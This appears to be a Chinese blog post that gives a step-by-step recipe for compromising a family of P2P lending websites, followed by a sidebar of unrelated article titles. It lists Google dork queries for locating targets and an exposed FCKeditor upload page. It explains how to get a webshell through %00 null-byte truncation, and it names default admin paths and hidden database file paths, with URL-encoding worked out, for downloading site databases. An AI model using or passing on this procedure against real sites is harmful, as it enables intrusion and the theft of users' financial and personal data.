某p2p存在通用上传漏洞
2024-09-26 08:05:41
google链接查找:
inurl:shouyi.asp
inurl:itemlist_xq.asp?id=
很多存在Fckeditor上传链接:
FCKeditor/editor/filemanager/connectors/uploadtest.html
抓包上传%00截断后发送就能获取shell
如果一次发送不行, 就发送多几次即可
如果多次发送同一数据包不行就把%00改成两个%00%00再截断送送一次或多次即可拿shell
通用后台与数据库下载:
后台: cpcms_admin\cplogin.asp
数据库: cp_data\cp_dsds%#^&@!daaa_cc\#$ssjjb##17#65&&^_^%@&@34546$3$3.mdb
数据库: cp_data\#$ssjjb##17#65&&^_^%@&@34546$3$3.mdb 或
后台: ajcmsadmin\account.asp
数据库: ajcmsadmin\nnyylczccydata\#$ssjjb##17#654543534546$3$3.mdb 或
后台: ailangeadmin\account.asp
数据库: shujukuDSDFE489#$###789sdf\DS#@FCsad54534234433###\#$ssjjb##17#65454###23233534546$3$3.mdb
注意, 如果要下载数据库, 要把特殊字符转为url编码。
比如:
cp_data\cp_dsds%#^&@!daaa_cc\#$ssjjb##17#65&&^_^%@&@34546$3$3.mdb
转码为:
cp_data\cp_dsds%25%23%5e%26%40%21%64%61%61%61%5f%63%63%5c%23%24%73%73%6a%6a%62%23%23%31%37%23%36%35%26%26%5e%5f%5e%25%40%26%40%33%34%35%34%36%24%33%24%33%2e%6d%64%62
些种p2p界面型形如下:
最新文章
- IOS - 本地数据持久化
- spring结合Quartz的集群功能实现
- 为YAESU FT-817ND 增加频谱功能
- 解决SlidingMenu和SwipeBackLayout右滑事件冲突问题
- iOS程序进入后台后仍运行定时器NSTimer
- 在windows2003系统上安装两个版本的oracle
- 使用 .NET 平台,如何玩转 Universal Windows 应用?
- Android - 广播机制和Service
- js设置元素的onclick传参方法
- LINUX的命令(未完待续)
- MAC中在eclipse luna上搭建移动平台自己主动化測试框架(UIAutomator/Appium/Robotium/MonkeyRunner)关键点记录
- 初识webpack——webpack四个基础概念
- 最长单词(一星级题目) 本来是很简单的,其实就是加个flag
- C++实现控制台版2048
- 对filter的初步认识
- spring 数据库多数据源路由
- 单片机CPU
- R(5): sql 数据处理
- sts,eclipse里面配置tomcat
- (转)关于三星cortex A9 Sate4412 开发板 uboot 启动的一些问题释疑
热门文章
- C运行时库
- Matlab中save与load函数的使用
- BZOJ 1797 最小割(最小割割边唯一性判定)
- 【bzoj3672】[Noi2014]购票 斜率优化dp+CDQ分治+树的点分治
- 【bzoj2743】[HEOI2012]采花 树状数组
- bzoj3524: [Poi2014]Couriers(主席树)
- c++ linux 判断string是中文的 or 英文的 字符串。
- Linux之根文件系统介绍与分析20160611
- python2.6升级2.7导致yum无法使用 No module named yum
- hadoop压缩和解压